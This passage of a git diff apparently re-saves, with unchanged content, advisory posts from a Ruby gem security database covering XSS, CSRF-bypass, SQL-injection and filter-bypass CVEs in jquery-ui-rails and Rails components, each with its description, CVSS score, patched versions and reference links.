-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/
-    - http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
-    - https://web.archive.org/web/20150316023043/http://www.securityfocus.com/bid/71106
-    - https://web.archive.org/web/20170316161850/http://www.securitytracker.com/id/1037035
-    - https://github.com/advisories/GHSA-wcm2-9c89-wmfm
----
+---
+layout: advisory
+title: 'CVE-2010-5312 (jquery-ui-rails): Cross-site Scripting in jquery-ui'
+comments: false
+categories:
+- jquery-ui-rails
+advisory:
+  gem: jquery-ui-rails
+  cve: 2010-5312
+  ghsa: wcm2-9c89-wmfm
+  url: https://nvd.nist.gov/vuln/detail/CVE-2010-5312
+  title: Cross-site Scripting in jquery-ui
+  date: 2017-10-24
+  description: |
+    Cross-site scripting (XSS) vulnerability in jquery.ui.dialog.js in
+    the Dialog widget in jQuery UI before 1.10.0 allows remote attackers
+    to inject arbitrary web script or HTML via the title option.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 4.0.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2010-5312
+    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/61a8e3f50796118e9f49fbd224b67d4065b40c50
+    - http://bugs.jqueryui.com/ticket/6016
+    - https://github.com/jquery/jquery-ui/commit/7e9060c109b928769a664dbcc2c17bd21231b6f3
+    - https://security.netapp.com/advisory/ntap-20190416-0007
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/98696
+    - https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f
+    - https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442
+    - http://rhn.redhat.com/errata/RHSA-2015-0442.html
+    - http://rhn.redhat.com/errata/RHSA-2015-1462.html
+    - http://seclists.org/oss-sec/2014/q4/613
+    - http://seclists.org/oss-sec/2014/q4/616
+    - http://www.debian.org/security/2015/dsa-3249
+    - https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc
+    - https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html
+    - https://www.drupal.org/sa-core-2022-002
+    - https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f
+    - https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442
+    - https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/
+    - http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
+    - https://web.archive.org/web/20150316023043/http://www.securityfocus.com/bid/71106
+    - https://web.archive.org/web/20170316161850/http://www.securitytracker.com/id/1037035
+    - https://github.com/advisories/GHSA-wcm2-9c89-wmfm
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-0446.md b/advisories/_posts/2017-10-24-CVE-2011-0446.md
index 12ef97b1..df41a334 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-0446.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-0446.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2011-0446 (actionview): XSS vulnerabilities in the mail_to helper in rails/actionview'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2011-0446
-  ghsa: 75w6-p6mg-vh8j
-  url: https://groups.google.com/g/rubyonrails-security/c/8CpI7egxX4E/m/SmtqtyOKWzYJ
-  title: XSS vulnerabilities in the mail_to helper in rails/actionview
-  date: 2017-10-24
-  description: |
-    Multiple cross-site scripting (XSS) vulnerabilities in the mail_to
-    helper in Ruby on Rails before 2.3.11, and 3.x before 3.0.4, when
-    javascript encoding is used, allow remote attackers to inject
-    arbitrary web script or HTML via a crafted (1) name or (2) email value.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 2.3.11"
-  - ">= 3.0.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-0446
-    - https://groups.google.com/g/rubyonrails-security/c/8CpI7egxX4E/m/SmtqtyOKWzYJ
-    - https://github.com/advisories/GHSA-75w6-p6mg-vh8j
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057650.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055074.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055088.html
-    - http://www.debian.org/security/2011/dsa-2247
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43274
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43666
-    - https://web.archive.org/web/20201208053819/http://www.securitytracker.com/id?1025064
-    - https://web.archive.org/web/20210121211512/http://www.securityfocus.com/bid/46291
----
+---
+layout: advisory
+title: 'CVE-2011-0446 (actionview): XSS vulnerabilities in the mail_to helper in rails/actionview'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2011-0446
+  ghsa: 75w6-p6mg-vh8j
+  url: https://groups.google.com/g/rubyonrails-security/c/8CpI7egxX4E/m/SmtqtyOKWzYJ
+  title: XSS vulnerabilities in the mail_to helper in rails/actionview
+  date: 2017-10-24
+  description: |
+    Multiple cross-site scripting (XSS) vulnerabilities in the mail_to
+    helper in Ruby on Rails before 2.3.11, and 3.x before 3.0.4, when
+    javascript encoding is used, allow remote attackers to inject
+    arbitrary web script or HTML via a crafted (1) name or (2) email value.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 2.3.11"
+  - ">= 3.0.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-0446
+    - https://groups.google.com/g/rubyonrails-security/c/8CpI7egxX4E/m/SmtqtyOKWzYJ
+    - https://github.com/advisories/GHSA-75w6-p6mg-vh8j
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057650.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055074.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055088.html
+    - http://www.debian.org/security/2011/dsa-2247
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43274
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43666
+    - https://web.archive.org/web/20201208053819/http://www.securitytracker.com/id?1025064
+    - https://web.archive.org/web/20210121211512/http://www.securityfocus.com/bid/46291
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-0447.md b/advisories/_posts/2017-10-24-CVE-2011-0447.md
index 22018235..9096cd21 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-0447.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-0447.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2011-0447 (actionpack): CSRF Protection Bypass in Ruby on Rails'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2011-0447
-  ghsa: 24fg-p96v-hxh8
-  url: http://weblog.rubyonrails.org/2011/2/8/csrf-protection-bypass-in-ruby-on-rails
-  title: CSRF Protection Bypass in Ruby on Rails
-  date: 2017-10-24
-  description: |
-    Ruby on Rails 2.1.x, 2.2.x, and 2.3.x before 2.3.11, and
-    3.x before 3.0.4, does not properly validate HTTP requests that
-    contain an X-Requested-With header, which makes it easier for
-    remote attackers to conduct cross-site request forgery (CSRF)
-    attacks via forged (1) AJAX or (2) API requests that leverage
-    "combinations of browser plugins and HTTP redirects,"
-    a related issue to CVE-2011-0696.
-  cvss_v2: 6.8
-  unaffected_versions:
-  - "< 2.1.0"
-  patched_versions:
-  - "~> 2.3.11"
-  - ">= 3.0.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-0447
-    - http://weblog.rubyonrails.org/2011/2/8/csrf-protection-bypass-in-ruby-on-rails
-    - https://groups.google.com/g/rubyonrails-security/c/LZWjzCPgNmU/m/HBgNjGahLsIJ
-    - https://github.com/advisories/GHSA-24fg-p96v-hxh8
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057650.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055074.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055088.html
-    - https://bugzilla.redhat.com/show_bug.cgi?id=677631
-    - http://www.debian.org/security/2011/dsa-2247
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43274
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43666
-    - https://web.archive.org/web/20210121211512/http://www.securityfocus.com/bid/46291
-    - https://web.archive.org/web/20201208053819/http://www.securitytracker.com/id?1025060
----
+---
+layout: advisory
+title: 'CVE-2011-0447 (actionpack): CSRF Protection Bypass in Ruby on Rails'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2011-0447
+  ghsa: 24fg-p96v-hxh8
+  url: http://weblog.rubyonrails.org/2011/2/8/csrf-protection-bypass-in-ruby-on-rails
+  title: CSRF Protection Bypass in Ruby on Rails
+  date: 2017-10-24
+  description: |
+    Ruby on Rails 2.1.x, 2.2.x, and 2.3.x before 2.3.11, and
+    3.x before 3.0.4, does not properly validate HTTP requests that
+    contain an X-Requested-With header, which makes it easier for
+    remote attackers to conduct cross-site request forgery (CSRF)
+    attacks via forged (1) AJAX or (2) API requests that leverage
+    "combinations of browser plugins and HTTP redirects,"
+    a related issue to CVE-2011-0696.
+  cvss_v2: 6.8
+  unaffected_versions:
+  - "< 2.1.0"
+  patched_versions:
+  - "~> 2.3.11"
+  - ">= 3.0.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-0447
+    - http://weblog.rubyonrails.org/2011/2/8/csrf-protection-bypass-in-ruby-on-rails
+    - https://groups.google.com/g/rubyonrails-security/c/LZWjzCPgNmU/m/HBgNjGahLsIJ
+    - https://github.com/advisories/GHSA-24fg-p96v-hxh8
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057650.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055074.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055088.html
+    - https://bugzilla.redhat.com/show_bug.cgi?id=677631
+    - http://www.debian.org/security/2011/dsa-2247
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43274
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43666
+    - https://web.archive.org/web/20210121211512/http://www.securityfocus.com/bid/46291
+    - https://web.archive.org/web/20201208053819/http://www.securitytracker.com/id?1025060
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-0448.md b/advisories/_posts/2017-10-24-CVE-2011-0448.md
index b833860f..667953ec 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-0448.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-0448.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2011-0448 (activerecord): Potential SQL Injection with limit in rails/activerecord'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2011-0448
-  ghsa: jmm9-2p29-vh2w
-  url: http://weblog.rubyonrails.org/2011/2/8/new-releases-2-3-11-and-3-0-4
-  title: Potential SQL Injection with limit in rails/activerecord
-  date: 2017-10-24
-  description: |
-    Ruby on Rails 3.0.x before 3.0.4 does not ensure that arguments to
-    the limit function specify integer values, which makes it easier
-    for remote attackers to conduct SQL injection attacks via a
-    non-numeric argument.
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 2.3.11"
-  - "> 3.0.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-0448
-    - http://weblog.rubyonrails.org/2011/2/8/new-releases-2-3-11-and-3-0-4
-    - https://groups.google.com/g/rubyonrails-security/c/tliQLPa_Tu0/m/rUCt9kyGGU4J
-    - https://github.com/advisories/GHSA-jmm9-2p29-vh2w
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057650.html
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43278
-    - https://web.archive.org/web/20201208053819/http://securitytracker.com/id?1025063
----
+---
+layout: advisory
+title: 'CVE-2011-0448 (activerecord): Potential SQL Injection with limit in rails/activerecord'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2011-0448
+  ghsa: jmm9-2p29-vh2w
+  url: http://weblog.rubyonrails.org/2011/2/8/new-releases-2-3-11-and-3-0-4
+  title: Potential SQL Injection with limit in rails/activerecord
+  date: 2017-10-24
+  description: |
+    Ruby on Rails 3.0.x before 3.0.4 does not ensure that arguments to
+    the limit function specify integer values, which makes it easier
+    for remote attackers to conduct SQL injection attacks via a
+    non-numeric argument.
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 2.3.11"
+  - "> 3.0.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-0448
+    - http://weblog.rubyonrails.org/2011/2/8/new-releases-2-3-11-and-3-0-4
+    - https://groups.google.com/g/rubyonrails-security/c/tliQLPa_Tu0/m/rUCt9kyGGU4J
+    - https://github.com/advisories/GHSA-jmm9-2p29-vh2w
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057650.html
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43278
+    - https://web.archive.org/web/20201208053819/http://securitytracker.com/id?1025063
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-0449.md b/advisories/_posts/2017-10-24-CVE-2011-0449.md
index 8b87ed39..dfe0d66e 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-0449.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-0449.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2011-0449 (actionpack): Filter Problems on Case-Insensitive Filesystems
-  in rails/actionpack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2011-0449
-  ghsa: 4ww3-3rxj-8v6q
-  url: http://weblog.rubyonrails.org/2011/2/8/new-releases-2-3-11-and-3-0-4
-  title: Filter Problems on Case-Insensitive Filesystems in rails/actionpack
-  date: 2017-10-24
-  description: |
-    actionpack/lib/action_view/template/resolver.rb in Ruby on Rails 3.0.x
-    before 3.0.4, when a case-insensitive filesystem is used, does not
-    properly implement filters associated with the list of available
-    templates, which allows remote attackers to bypass intended access
-    restrictions via an action name that uses an unintended case for
-    alphabetic characters.
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - ">= 3.0.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-0449
-    - http://weblog.rubyonrails.org/2011/2/8/new-releases-2-3-11-and-3-0-4
-    - https://github.com/rails/rails/commit/6f80224057803f85b3f448936aae89e742452c3b
-    - https://groups.google.com/g/rubyonrails-security/c/Ni8fvBdhszY/m/T1vfhC5bNAQJ
-    - https://github.com/advisories/GHSA-4ww3-3rxj-8v6q
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057650.html
-    - https://bugzilla.redhat.com/show_bug.cgi?id=679351
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43278
-    - https://web.archive.org/web/20201208053819/http://securitytracker.com/id?1025061
----
+---
+layout: advisory
+title: 'CVE-2011-0449 (actionpack): Filter Problems on Case-Insensitive Filesystems
+  in rails/actionpack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2011-0449
+  ghsa: 4ww3-3rxj-8v6q
+  url: http://weblog.rubyonrails.org/2011/2/8/new-releases-2-3-11-and-3-0-4
+  title: Filter Problems on Case-Insensitive Filesystems in rails/actionpack
+  date: 2017-10-24
+  description: |
+    actionpack/lib/action_view/template/resolver.rb in Ruby on Rails 3.0.x
+    before 3.0.4, when a case-insensitive filesystem is used, does not
+    properly implement filters associated with the list of available
+    templates, which allows remote attackers to bypass intended access
+    restrictions via an action name that uses an unintended case for
+    alphabetic characters.
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - ">= 3.0.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-0449
+    - http://weblog.rubyonrails.org/2011/2/8/new-releases-2-3-11-and-3-0-4
+    - https://github.com/rails/rails/commit/6f80224057803f85b3f448936aae89e742452c3b
+    - https://groups.google.com/g/rubyonrails-security/c/Ni8fvBdhszY/m/T1vfhC5bNAQJ
+    - https://github.com/advisories/GHSA-4ww3-3rxj-8v6q
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057650.html
+    - https://bugzilla.redhat.com/show_bug.cgi?id=679351
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/43278
+    - https://web.archive.org/web/20201208053819/http://securitytracker.com/id?1025061
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-2197.md b/advisories/_posts/2017-10-24-CVE-2011-2197.md
index 9384d329..03823e42 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-2197.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-2197.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2011-2197 (activesupport): Potential XSS Vulnerability in Ruby on Rails
-  Applications'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2011-2197
-  ghsa: v9v4-7jp6-8c73
-  url: http://weblog.rubyonrails.org/2011/6/8/potential-xss-vulnerability-in-ruby-on-rails-applications
-  title: Potential XSS Vulnerability in Ruby on Rails Applications
-  date: 2017-10-24
-  description: |
-    The cross-site scripting (XSS) prevention feature in Ruby on Rails 2.x
-    before 2.3.12, 3.0.x before 3.0.8, and 3.1.x before 3.1.0.rc2 does
-    not properly handle mutation of safe buffers, which makes it easier
-    for remote attackers to conduct XSS attacks via crafted strings to an
-    application that uses a problematic string method, as demonstrated
-    by the sub method.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 2.3.12"
-  - ">= 3.0.8"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-2197
-    - http://weblog.rubyonrails.org/2011/6/8/potential-xss-vulnerability-in-ruby-on-rails-applications
-    - https://github.com/rails/rails/commit/53a2c0baf2b128dd4808eca313256f6f4bb8c4cd
-    - https://github.com/rails/rails/commit/ed3796434af6069ced6a641293cf88eef3b284da
-    - https://groups.google.com/g/rubyonrails-security/c/LlFuesyWxPs/m/1OBxRA1gO2YJ
-    - https://gist.github.com/NZKoz/b2ceb626fc2bcdfe497f
-    - https://github.com/advisories/GHSA-v9v4-7jp6-8c73
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062514.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062090.html
-    - http://openwall.com/lists/oss-security/2011/06/09/2
-    - http://openwall.com/lists/oss-security/2011/06/13/9
----
+---
+layout: advisory
+title: 'CVE-2011-2197 (activesupport): Potential XSS Vulnerability in Ruby on Rails
+  Applications'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2011-2197
+  ghsa: v9v4-7jp6-8c73
+  url: http://weblog.rubyonrails.org/2011/6/8/potential-xss-vulnerability-in-ruby-on-rails-applications
+  title: Potential XSS Vulnerability in Ruby on Rails Applications
+  date: 2017-10-24
+  description: |
+    The cross-site scripting (XSS) prevention feature in Ruby on Rails 2.x
+    before 2.3.12, 3.0.x before 3.0.8, and 3.1.x before 3.1.0.rc2 does
+    not properly handle mutation of safe buffers, which makes it easier
+    for remote attackers to conduct XSS attacks via crafted strings to an
+    application that uses a problematic string method, as demonstrated
+    by the sub method.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 2.3.12"
+  - ">= 3.0.8"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-2197
+    - http://weblog.rubyonrails.org/2011/6/8/potential-xss-vulnerability-in-ruby-on-rails-applications
+    - https://github.com/rails/rails/commit/53a2c0baf2b128dd4808eca313256f6f4bb8c4cd
+    - https://github.com/rails/rails/commit/ed3796434af6069ced6a641293cf88eef3b284da
+    - https://groups.google.com/g/rubyonrails-security/c/LlFuesyWxPs/m/1OBxRA1gO2YJ
+    - https://gist.github.com/NZKoz/b2ceb626fc2bcdfe497f
+    - https://github.com/advisories/GHSA-v9v4-7jp6-8c73
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062514.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062090.html
+    - http://openwall.com/lists/oss-security/2011/06/09/2
+    - http://openwall.com/lists/oss-security/2011/06/13/9
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-2929.md b/advisories/_posts/2017-10-24-CVE-2011-2929.md
index a46d8bee..ee02dd75 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-2929.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-2929.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2011-2929 (actionpack): Filter Skipping Vulnerability in Ruby on Rails
-  3.0/actionpack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2011-2929
-  ghsa: r7q2-5gqg-6c7q
-  url: https://rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
-  title: Filter Skipping Vulnerability in Ruby on Rails 3.0/actionpack
-  date: 2017-10-24
-  description: |
-    The template selection functionality in
-    actionpack/lib/action_view/template/resolver.rb in Ruby on Rails
-    3.0.x before 3.0.10 and 3.1.x before 3.1.0.rc6 does not properly
-    handle glob characters, which allows remote attackers to render
-    arbitrary views via a crafted URL, related to a
-    "filter skipping vulnerability."
-  cvss_v2: 5.0
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 3.0.10"
-  - "~> 3.1.0.rc6"
-  - ">= 3.1.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-2929
-    - http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
-    - https://github.com/rails/rails/commit/5f94b93279f6d0682fafb237c301302c107a9552
-    - https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY/m/Ya9-T266u8sJ
-    - https://bugzilla.redhat.com/show_bug.cgi?id=731432
-    - https://github.com/advisories/GHSA-r7q2-5gqg-6c7q
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065109.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065212.html
-    - http://www.openwall.com/lists/oss-security/2011/08/17/1
-    - http://www.openwall.com/lists/oss-security/2011/08/19/11
-    - http://www.openwall.com/lists/oss-security/2011/08/20/1
-    - http://www.openwall.com/lists/oss-security/2011/08/22/13
-    - http://www.openwall.com/lists/oss-security/2011/08/22/14
-    - http://www.openwall.com/lists/oss-security/2011/08/22/5
----
+---
+layout: advisory
+title: 'CVE-2011-2929 (actionpack): Filter Skipping Vulnerability in Ruby on Rails
+  3.0/actionpack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2011-2929
+  ghsa: r7q2-5gqg-6c7q
+  url: https://rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
+  title: Filter Skipping Vulnerability in Ruby on Rails 3.0/actionpack
+  date: 2017-10-24
+  description: |
+    The template selection functionality in
+    actionpack/lib/action_view/template/resolver.rb in Ruby on Rails
+    3.0.x before 3.0.10 and 3.1.x before 3.1.0.rc6 does not properly
+    handle glob characters, which allows remote attackers to render
+    arbitrary views via a crafted URL, related to a
+    "filter skipping vulnerability."
+  cvss_v2: 5.0
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 3.0.10"
+  - "~> 3.1.0.rc6"
+  - ">= 3.1.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-2929
+    - http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
+    - https://github.com/rails/rails/commit/5f94b93279f6d0682fafb237c301302c107a9552
+    - https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY/m/Ya9-T266u8sJ
+    - https://bugzilla.redhat.com/show_bug.cgi?id=731432
+    - https://github.com/advisories/GHSA-r7q2-5gqg-6c7q
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065109.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065212.html
+    - http://www.openwall.com/lists/oss-security/2011/08/17/1
+    - http://www.openwall.com/lists/oss-security/2011/08/19/11
+    - http://www.openwall.com/lists/oss-security/2011/08/20/1
+    - http://www.openwall.com/lists/oss-security/2011/08/22/13
+    - http://www.openwall.com/lists/oss-security/2011/08/22/14
+    - http://www.openwall.com/lists/oss-security/2011/08/22/5
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-2930.md b/advisories/_posts/2017-10-24-CVE-2011-2930.md
index 4268137e..699cd3ac 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-2930.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-2930.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2011-2930 (activerecord): SQL Injection Vulnerability in quote_table_name
-  in rails/activerecord'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2011-2930
-  ghsa: h6w6-xmqv-7q78
-  url: http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
-  title: SQL Injection Vulnerability in quote_table_name in rails/activerecord
-  date: 2017-10-24
-  description: |
-    Multiple SQL injection vulnerabilities in the
-    quote_table_name method in the ActiveRecord adapters in
-    activerecord/lib/active_record/connection_adapters in Ruby on Rails
-    before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allow
-    remote attackers to execute arbitrary SQL commands via a crafted column name.
-  cvss_v2: 7.5
-  patched_versions:
-  - "~> 2.3.13"
-  - "~> 3.0.10"
-  - "~> 3.1.0.rc5"
-  - ">= 3.1.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-2930
-    - http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
-    - https://groups.google.com/g/rubyonrails-security/c/ah5HN0S8OJs/m/MN35sDZdqLEJ
-    - https://github.com/rails/rails/commit/8a39f411dc3c806422785b1f4d5c7c9d58e4bf85
-    - https://github.com/advisories/GHSA-h6w6-xmqv-7q78
-    - https://bugzilla.redhat.com/show_bug.cgi?id=731438
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065212.html
-    - http://www.debian.org/security/2011/dsa-2301
-    - http://www.openwall.com/lists/oss-security/2011/08/17/1
-    - http://www.openwall.com/lists/oss-security/2011/08/19/11
-    - http://www.openwall.com/lists/oss-security/2011/08/20/1
-    - http://www.openwall.com/lists/oss-security/2011/08/22/13
-    - http://www.openwall.com/lists/oss-security/2011/08/22/14
-    - http://www.openwall.com/lists/oss-security/2011/08/22/5
----
+---
+layout: advisory
+title: 'CVE-2011-2930 (activerecord): SQL Injection Vulnerability in quote_table_name
+  in rails/activerecord'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2011-2930
+  ghsa: h6w6-xmqv-7q78
+  url: http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
+  title: SQL Injection Vulnerability in quote_table_name in rails/activerecord
+  date: 2017-10-24
+  description: |
+    Multiple SQL injection vulnerabilities in the
+    quote_table_name method in the ActiveRecord adapters in
+    activerecord/lib/active_record/connection_adapters in Ruby on Rails
+    before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allow
+    remote attackers to execute arbitrary SQL commands via a crafted column name.
+  cvss_v2: 7.5
+  patched_versions:
+  - "~> 2.3.13"
+  - "~> 3.0.10"
+  - "~> 3.1.0.rc5"
+  - ">= 3.1.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-2930
+    - http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
+    - https://groups.google.com/g/rubyonrails-security/c/ah5HN0S8OJs/m/MN35sDZdqLEJ
+    - https://github.com/rails/rails/commit/8a39f411dc3c806422785b1f4d5c7c9d58e4bf85
+    - https://github.com/advisories/GHSA-h6w6-xmqv-7q78
+    - https://bugzilla.redhat.com/show_bug.cgi?id=731438
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065212.html
+    - http://www.debian.org/security/2011/dsa-2301
+    - http://www.openwall.com/lists/oss-security/2011/08/17/1
+    - http://www.openwall.com/lists/oss-security/2011/08/19/11
+    - http://www.openwall.com/lists/oss-security/2011/08/20/1
+    - http://www.openwall.com/lists/oss-security/2011/08/22/13
+    - http://www.openwall.com/lists/oss-security/2011/08/22/14
+    - http://www.openwall.com/lists/oss-security/2011/08/22/5
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-2931.md b/advisories/_posts/2017-10-24-CVE-2011-2931.md
index 2ee20b81..8ff31483 100644
